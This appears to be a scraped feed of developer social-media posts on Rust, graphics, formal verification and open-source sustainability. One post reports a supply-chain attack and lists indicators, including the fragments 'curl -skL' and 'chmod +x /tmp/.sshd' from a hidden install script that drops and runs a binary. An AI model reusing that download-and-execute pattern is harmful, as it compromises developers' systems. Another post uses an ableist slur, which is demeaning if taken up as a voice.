datapture

Rust promises zero-cost abstractions. But how well does it actually deliver? 🦀 Two researchers dug deep, studying the compiler, modifying it, and collecting real performance data for a talk at C++Russia 2026. 150+ slides covering Rust's performance trade-offs in a systematic, data-driven way. Possibly the most comprehensive treatment of the topic to date. Slides + repo: 🔗 github.com/yugr/rust-slid… #Rust #RustLang #SystemsProgramming #Performance #Compilers #CPlusPlus

Go-to-Rust migration guide you've been waiting for. 🦀 Matthias Endler from corrode.dev just published one of the most honest, practical guides on migrating backend services from Go to Rust. No hype. Just real trade-offs: ✓ nil panics → Option ✓ -race flags → compile-time Send/Sync ✓ if err != nil → Result + ? ✗ Goroutines → async coloring (the real pain point) ✗ Go compile times → Rust compile times (honest warning) Also covers ecosystem mapping, integration strategies, and when to keep Go. 🔗 corrode.dev/learn/migratio… #Rust #RustLang #Go #Golang #BackendDevelopment

Rust + scoped errors = finally feels right. 🦀 scoped-error is a new crate that attaches context once per function, not at every call site. Clean error trees with file locations, tiny core, std-compatible. A fresh take if anyhow/thiserror/snafu haven't fully clicked for you. 🔗 kanru.info/scoped-error/ #Rust #RustLang #ErrorHandling #OpenSource

Required reading if you've ever wanted to understand SIMD beyond "it makes things fast." mcyoung.xyz/2023/11/27/sim…

This guy is retarded (what the FUCK is "resistant to supply chains"? you mean "attacks on supply chains"?) and he is wrong. I am totally serious when I say this, I'd trust RedHat Linux more than NixOS for a server that has to run Linux. NixOS doesn't even have exhaustive working LSM support yet. Their model doesn't _even_ solve software that needs to be patched immediately (within minutes, or even seconds), and they are quite slow at building their patches and releasing them to cache as they do not have enough compute. The whole "build static system, roll it out atomically" model can't handle tiny incremental system patches well. (I still like it though, the bad part is that it is one single static layer) The reason I use NixOS is because it is extremely moldable, great for tinkering and amazing if you want to build something completely custom. Anduril uses it for their drones' systems not because it claims to be more secure (it's a linux system without any security modules ffs, and kamikaze drones are famously being known for being internet-connected) but because it is an excellent builder for a Nix-free (but not /nix/store free) Linux system install. Not because it's more secure than RedHat Enterprise Linux or whatever else. It isn't. Outside of the critical services, it barely even enables sandboxing for systemd units in official modules (hope modular services fixes this though) I know for a fact that I'm not an important target, so I do not care that particularly much about acquiring patches for whatever software an hour or day late. If you do, you usually won't use NixOS. (Or if you do, you'd build basically your own distro on top of the NixOS module system or a slimmed down fork of nixpkgs and have your own build farm, requiring you to build vastly less software) Also if you really want an ultra mega secure system you'd not be using Linux in the first place. It is a project that has historically chosen tiny gains in performance over any security gains. I'd not go as far as calling it "security hostile" myself, but a lot of the people working on it can be described as so. And no, I am not advocating for any of the BSDs.

Interesting new SDF-related paper just dropped: "Dual Contouring of Signed Distance Data" (SIGGRAPH 2026) gatc.cs.columbia.edu/projects/dual-…

‼️🚨 BREAKING: Another supply chain attack. 700+ GitHub repositories flagged, including PHP and Node.js projects. The malicious script was planted across all of them. When a developer installs the package, the script silently downloads a Linux file from GitHub, hides it under the name /tmp/.sshd (so it looks like a normal system file), and runs it in the background. It also skips security checks on the download and hides any error messages. 8 PHP packages on Packagist (the main PHP code library) were confirmed infected. The attacker hid the script inside a JavaScript config file (package.json) instead of the PHP one (composer.json), so PHP developers reviewing their code would not notice it. The biggest risk is to devdojo/wave (6,400 stars) and devdojo/genesis (9,100 installs), both popular Laravel project templates. Developers who use these templates run the bad script the moment they install dependencies. The same payload was also dropped into GitHub Actions (automated build pipelines) under a fake step called "Dependency Cache Sync," meaning it could infect company build servers too. Packagist removed the bad packages, but the auto-updating versions (dev-main, dev-master, 3.x-dev) can quietly come back if the original repos stay infected. IOCs: GitHub account parikhpreyash4 repo systemd-network-helper-aa5c751f drop path /tmp/.sshd command fragments curl -skL and chmod +x /tmp/.sshd.

Oracle attacks are a reminder that clean code can still encode bad assumptions. You can pass reviews, tests, and style checks - and still fail adversarial reality. The move is learning the attack *class*, not just memorizing one incident. Patch Euler but miss the class behind it, and the same assumption takes down a different protocol. smartcontractshacking.com/attacks/oracle…

Inspired by this article, I spent some time this week in Turborepo: 1. Removing all .expect() and .unwrap() usage from implementation code 2. Fixing file system logical bugs corrode.dev/blog/bugs-rust…

@mitchellh check my proposal, TAINT: github.com/juli/taint

Funding OSS is a hot topic today! I got to spend a lot of time over the last two years working on paying OSS maintainers at @Google. We spent a few million dollars and funded some relatively high profile work, in addition to a lot of smaller projects. A 🧵on problems I saw!

The uncomfortable truth is that trillion dollar industries are often built on critical infrastructure maintained by exhausted volunteers with zero contractual obligation to anyone. Companies love calling OSS a “community” right up until they expect enterprise level guarantees for free @mitchellh

@mitchellh On top of this, we have also left these developers unprotected making them the weakest entity without being paid without asking for being part of the chain we have made them the target. I noted similar thoughts a few days back blog.anantshri.info/open-source-un…

Supply chain attacks and OSS sustainability go hand in hand. I've semi-seriously joked for years that OSS upstreams should periodically purposely inject full vulns into their code and let downstreams fuck around and find out. Downstreams can pay to get the non-FAFO version. The not joke part is simply that OSS maintainers aren't a supply chain. OSS maintainers are not responsible for monitoring CVEs (because, they are not a supply chain). OSS maintainers are not at fault when bad shit happens to downstreams, because basically every OSS license (MIT, Apache, GPL, etc.) literally says: the software is provided "as-is, without warranty." You get what you pay for (that is to say: absolutely nothing!) Now, the joke part is that I do believe there is an ethical obligation to try to prevent harm downstream. But "try" is the key word. So, this isn't a serious proposal. But, if you're using OSS code and you're not paying for a license with a contract that promises some kind of warranty, you have no supply chain. You (the downstream user of an OSS lib) ARE the supply chain. To use a metaphor: physical goods have a real supply chain. Car manufacturers, chips, clothes, toys, etc. You have a signed commercial agreement with all your suppliers that promises quantity AND quality and blowback if either are missed. Thats a supply chain. If someone puts some chips on the side of the road with a "FREE" sign, then you integrate those into a product, then find out those chips are hacking customers, its your fault, not the person who dropped them on the side of the road.

This is called interior mapping, and I also did that in my #Xash3D engine game. I have tested it as low as Nvidia 8600 GT from 2007 and, surprisingly, this particular setup isn't GPU-heavy at all.

L'Hôpital's Rule For differentiable functions f and g near a (with g'(a) ≠ 0), lim x→a f(x)/g(x) = lim x→a f'(x)/g'(x) The diagrams illustrate the geometric meaning: as x approaches a, the ratio of the function values equals the ratio of the tangent slopes df(a)/dg(a) at that point. This rule is applied to resolve indeterminate limit forms 0/0 and ∞/∞ by differentiating the numerator and denominator (and repeating as needed).

Formal verification of software is having a moment. Thanks Vitalik🫡! But most unfortunately, assume Lean is the only path. It's one of many approaches & each comes with very different trade-offs. Let's look at the trade-offs in four axis: 1) Spec depth: how much of a program can be formally verified using the tool. 2) Security: all possible outputs proven safe. 3) LLM ease: how easily an LLM produces code that meets spec. 4) Succinct verification (probably nothing 🤷): verifying the whole chain — natural language → spec → formally verified code — end-to-end in <1s. *A superpower only cryptography (ZK proofs) can deliver. Before: machine speed coding, human speed verification. Lots of bugs, lots of hacks.. lots of pain. After: machine speed coding, machine speed verification. Provably correct, end-to-end, in under a second. We have Vericoding working at ICME Labs. DM to try it or collab!

I just had the chance to watch Samyak Sarnayak's talk about cancellation safety and async Rust (and how a `&mut` can lead to a deadlock). If this is a topic that interests you, I recommend checking it out: samyak.me/talks/cancel/

Estoy programando el Guinxu Engine de 0 a pelo de verdad, sin OpenGL. Empecé dibujando 1 pixel. Luego lo aproveché para dibujar lineas. Y ahora puedo dibujar triángulos baricéntricos con color en cada vértice. Me gustaría acabar mostrando modelos 3D si no se me complica mucho.